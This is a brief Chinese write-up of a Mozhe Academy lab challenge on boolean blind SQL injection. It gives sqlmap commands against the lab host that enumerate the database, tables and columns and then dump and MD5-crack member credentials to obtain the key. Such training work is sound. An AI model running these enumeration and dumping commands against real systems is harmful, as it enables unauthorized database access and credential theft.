墨者学院——SQL注入漏洞测试(布尔盲注)

题目： 背景介绍
一位热心的网友再次向“墨者”安全工程师挑战，“墨者”工程师在注入时发现网页无回显，“墨者”工程师想了一会就注入完成拿到了key。

所以从这里的URL入手，存在注入点

利用sqlmap注入：

1. sqlmap.py -u url --current-db 获取到的数据库名是stormgroup

sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 --current-db

2. sqlmap.py -u url -D 获取到的数据名 --tables 获取到的表是member和notice

sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 -D stormgroup --table

3. sqlmap.py -u url -D 获取到的数据库名 -T 获取到的表名 --columns 获取到的列名分别是 name password status

sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 -D stormgroup -T member --columns

4. 接下来就不断按回车，最后出现name和password，有两个所以要分别尝试（password需要通过MD5解码才行）：
   

提交得到KEY